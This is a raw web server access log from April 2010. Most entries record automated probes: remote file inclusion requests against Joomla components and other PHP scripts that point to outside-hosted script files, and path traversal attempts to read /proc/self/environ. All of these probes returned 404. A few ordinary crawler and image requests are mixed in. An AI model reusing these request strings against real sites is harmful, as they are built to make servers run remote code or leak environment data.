88.191.94.188 - - [20/Apr/2010:22:28:26 -0500] "GET //components/EXIF.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 304 "-""Mozilla/5.0"
88.191.94.188 - - [20/Apr/2010:22:28:26 -0500] "GET /logs//components/EXIF.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
88.191.94.188 - - [20/Apr/2010:22:28:26 -0500] "GET /logs/access_log.1268265600%20%20//components/EXIF.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
88.191.94.188 - - [20/Apr/2010:22:28:33 -0500] "GET //components/EXIF.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 304 "-""Mozilla/5.0"
88.191.94.188 - - [20/Apr/2010:22:28:33 -0500] "GET /logs/access_log.1268265600%20%20//components/EXIF.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
88.191.94.188 - - [20/Apr/2010:22:28:33 -0500] "GET /logs//components/EXIF.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
88.191.94.188 - - [20/Apr/2010:22:29:30 -0500] "GET /logs//components/EXIF.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
88.191.94.188 - - [20/Apr/2010:22:29:30 -0500] "GET /logs/access_log.1268265600//components/EXIF.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
88.191.94.188 - - [20/Apr/2010:22:29:30 -0500] "GET //components/EXIF.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 304 "-""Mozilla/5.0"
88.191.94.188 - - [20/Apr/2010:22:30:00 -0500] "GET /logs/access_log.1268265600//components/EXIF.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
88.191.94.188 - - [20/Apr/2010:22:30:00 -0500] "GET //components/EXIF.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 304 "-""Mozilla/5.0"
88.191.94.188 - - [20/Apr/2010:22:30:00 -0500] "GET /logs//components/EXIF.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:22:30:20 -0500] "GET /logs/access_log.1250294400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [20/Apr/2010:22:31:36 -0500] "GET /logs/access_log.1184630400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.222.152.66 - - [20/Apr/2010:22:33:55 -0500] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:22:33:55 -0500] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:22:33:55 -0500] "GET /logs/access_log.1265760000/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
174.133.171.74 - - [20/Apr/2010:22:33:57 -0500] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
174.133.171.74 - - [20/Apr/2010:22:33:57 -0500] "GET /logs/access_log.1265760000/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
174.133.171.74 - - [20/Apr/2010:22:33:57 -0500] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:22:34:09 -0500] "GET /logs/access_log.1194998400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
174.133.171.74 - - [20/Apr/2010:22:35:53 -0500] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
174.133.171.74 - - [20/Apr/2010:22:35:53 -0500] "GET /logs/access_log.1268956800%20%20/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
174.133.171.74 - - [20/Apr/2010:22:35:53 -0500] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
174.133.171.74 - - [20/Apr/2010:22:36:17 -0500] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
174.133.171.74 - - [20/Apr/2010:22:36:17 -0500] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
174.133.171.74 - - [20/Apr/2010:22:36:17 -0500] "GET /logs/access_log.1268956800%20%20/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
174.133.171.74 - - [20/Apr/2010:22:36:23 -0500] "GET /logs/access_log.1268956800%20%20/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
174.133.171.74 - - [20/Apr/2010:22:36:23 -0500] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
174.133.171.74 - - [20/Apr/2010:22:36:23 -0500] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
91.121.149.159 - - [20/Apr/2010:22:36:47 -0500] "GET //index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
174.133.171.74 - - [20/Apr/2010:22:37:22 -0500] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
174.133.171.74 - - [20/Apr/2010:22:37:22 -0500] "GET /logs/access_log.1268956800/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
174.133.171.74 - - [20/Apr/2010:22:37:22 -0500] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
91.121.149.159 - - [20/Apr/2010:22:37:39 -0500] "GET /logs//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
91.121.149.159 - - [20/Apr/2010:22:37:39 -0500] "GET //index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
87.250.255.243 - - [20/Apr/2010:22:38:36 -0500] "GET /logs/access_log.1229644800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
120.28.206.29 - - [20/Apr/2010:22:39:22 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://www.12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
120.28.206.29 - - [20/Apr/2010:22:39:22 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://www.12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
120.28.206.29 - - [20/Apr/2010:22:39:22 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://www.12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
120.28.206.29 - - [20/Apr/2010:22:39:22 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://www.12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
120.28.206.29 - - [20/Apr/2010:22:39:22 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://www.12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
120.28.206.29 - - [20/Apr/2010:22:39:22 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://www.12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
120.28.206.29 - - [20/Apr/2010:22:39:28 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://www.12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
120.28.206.29 - - [20/Apr/2010:22:39:29 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://www.12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
120.28.206.29 - - [20/Apr/2010:22:39:30 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://www.12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
120.28.206.29 - - [20/Apr/2010:22:39:31 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://www.12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
120.28.206.29 - - [20/Apr/2010:22:39:31 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://www.12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
120.28.206.29 - - [20/Apr/2010:22:39:31 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://www.12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
120.28.206.29 - - [20/Apr/2010:22:39:32 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://www.12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
120.28.206.29 - - [20/Apr/2010:22:39:32 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://www.12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
87.198.171.53 - - [20/Apr/2010:22:39:33 -0500] "GET //index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
120.28.206.29 - - [20/Apr/2010:22:39:33 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://www.12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
120.28.206.29 - - [20/Apr/2010:22:39:33 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://www.12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
120.28.206.29 - - [20/Apr/2010:22:39:34 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://www.12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
120.28.206.29 - - [20/Apr/2010:22:39:34 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://www.12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
120.28.206.29 - - [20/Apr/2010:22:39:34 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://www.12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
120.28.206.29 - - [20/Apr/2010:22:39:35 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://www.12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
120.28.206.29 - - [20/Apr/2010:22:39:36 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://www.12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
120.28.206.29 - - [20/Apr/2010:22:39:36 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://www.12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
120.28.206.29 - - [20/Apr/2010:22:39:37 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://www.12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
120.28.206.29 - - [20/Apr/2010:22:39:37 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://www.12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
120.28.206.29 - - [20/Apr/2010:22:39:38 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://www.12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
120.28.206.29 - - [20/Apr/2010:22:39:38 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://www.12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
120.28.206.29 - - [20/Apr/2010:22:39:38 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://www.12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
87.250.255.243 - - [20/Apr/2010:22:40:16 -0500] "GET /logs/access_log.1171411200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.222.152.66 - - [20/Apr/2010:22:40:23 -0500] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:22:40:23 -0500] "GET /logs/access_log.1268956800/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:22:40:23 -0500] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
87.198.171.53 - - [20/Apr/2010:22:40:29 -0500] "GET //index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
87.250.255.243 - - [20/Apr/2010:22:42:49 -0500] "GET /logs/access_log.1199491200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
91.121.149.159 - - [20/Apr/2010:22:43:44 -0500] "GET /logs/access_log.1271030400//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
91.121.149.159 - - [20/Apr/2010:22:43:45 -0500] "GET //index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
91.121.149.159 - - [20/Apr/2010:22:43:45 -0500] "GET /logs//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
87.250.255.243 - - [20/Apr/2010:22:45:21 -0500] "GET /logs/access_log.1226620800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.222.152.66 - - [20/Apr/2010:22:45:31 -0500] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:22:45:31 -0500] "GET /logs/access_log.1268956800%20%20/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:22:45:31 -0500] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
69.175.12.234 - - [20/Apr/2010:22:45:51 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
69.175.12.234 - - [20/Apr/2010:22:45:51 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
69.175.12.234 - - [20/Apr/2010:22:45:51 -0500] "GET /logs/access_log.1270598400%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:22:46:09 -0500] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:22:46:09 -0500] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:22:46:09 -0500] "GET /logs/access_log.1268956800%20%20/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:22:46:38 -0500] "GET /logs/access_log.1169337600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
91.121.149.159 - - [20/Apr/2010:22:47:11 -0500] "GET /logs/access_log.1271030400//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
91.121.149.159 - - [20/Apr/2010:22:47:11 -0500] "GET //index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
91.121.149.159 - - [20/Apr/2010:22:47:12 -0500] "GET /logs//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
69.175.12.234 - - [20/Apr/2010:22:48:12 -0500] "GET /logs/access_log.1268265600%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
87.198.171.53 - - [20/Apr/2010:22:48:18 -0500] "GET /logs//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
87.198.171.53 - - [20/Apr/2010:22:48:19 -0500] "GET //index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
87.198.171.53 - - [20/Apr/2010:22:48:29 -0500] "GET /logs//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
87.198.171.53 - - [20/Apr/2010:22:48:30 -0500] "GET //index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
69.163.178.140 - - [20/Apr/2010:22:48:58 -0500] "GET /logs//SSI.php?sourcedir=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
69.163.178.140 - - [20/Apr/2010:22:48:58 -0500] "GET /logs/access_log.1268956800%20%20//SSI.php?sourcedir=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
69.163.178.140 - - [20/Apr/2010:22:48:58 -0500] "GET //SSI.php?sourcedir=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:22:49:11 -0500] "GET /logs/access_log.1215907200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
69.163.178.140 - - [20/Apr/2010:22:49:41 -0500] "GET /logs//SSI.php?sourcedir=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
69.163.178.140 - - [20/Apr/2010:22:49:41 -0500] "GET /logs/access_log.1268956800%20%20//SSI.php?sourcedir=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
69.163.178.140 - - [20/Apr/2010:22:49:41 -0500] "GET //SSI.php?sourcedir=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
174.133.171.74 - - [20/Apr/2010:22:51:56 -0500] "GET //SSI.php?sourcedir=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
174.133.171.74 - - [20/Apr/2010:22:51:56 -0500] "GET /logs//SSI.php?sourcedir=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
174.133.171.74 - - [20/Apr/2010:22:51:56 -0500] "GET /logs/access_log.1268956800%20%20//SSI.php?sourcedir=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
174.133.171.74 - - [20/Apr/2010:22:52:58 -0500] "GET //SSI.php?sourcedir=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
174.133.171.74 - - [20/Apr/2010:22:52:58 -0500] "GET /logs//SSI.php?sourcedir=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
174.133.171.74 - - [20/Apr/2010:22:52:58 -0500] "GET /logs/access_log.1268956800%20%20//SSI.php?sourcedir=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:22:53:00 -0500] "GET /logs/access_log.1176249600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
212.241.251.224 - - [20/Apr/2010:22:53:18 -0500] "GET /logs//index.php?Page=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 299 "-""Mozilla/5.0"
212.241.251.224 - - [20/Apr/2010:22:53:18 -0500] "GET /logs/access_log.1240099200//index.php?Page=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 321 "-""Mozilla/5.0"
212.241.251.224 - - [20/Apr/2010:22:53:18 -0500] "GET //index.php?Page=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 294 "-""Mozilla/5.0"
217.26.54.19 - - [20/Apr/2010:22:53:28 -0500] "GET /logs//index1.php?menu=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 300 "-""libwww-perl/5.825"
217.26.54.19 - - [20/Apr/2010:22:53:29 -0500] "GET //index1.php?menu=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.825"
87.198.171.53 - - [20/Apr/2010:22:55:07 -0500] "GET /logs/access_log.1271030400//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
87.198.171.53 - - [20/Apr/2010:22:55:08 -0500] "GET //index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
87.198.171.53 - - [20/Apr/2010:22:55:09 -0500] "GET /logs//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
87.198.171.53 - - [20/Apr/2010:22:55:23 -0500] "GET /logs/access_log.1271030400//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
87.198.171.53 - - [20/Apr/2010:22:55:24 -0500] "GET //index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
87.198.171.53 - - [20/Apr/2010:22:55:24 -0500] "GET /logs//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
87.250.255.243 - - [20/Apr/2010:22:55:32 -0500] "GET /logs/access_log.1213488000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
69.175.12.234 - - [20/Apr/2010:22:56:48 -0500] "GET /logs/access_log.1270598400/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
110.45.147.226 - - [20/Apr/2010:22:57:45 -0500] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
110.45.147.226 - - [20/Apr/2010:22:57:45 -0500] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
110.45.147.226 - - [20/Apr/2010:22:57:45 -0500] "GET /logs/access_log.1270684800%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 379 "-""Mozilla/5.0"
69.175.12.234 - - [20/Apr/2010:22:57:55 -0500] "GET /logs/access_log.1268265600/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
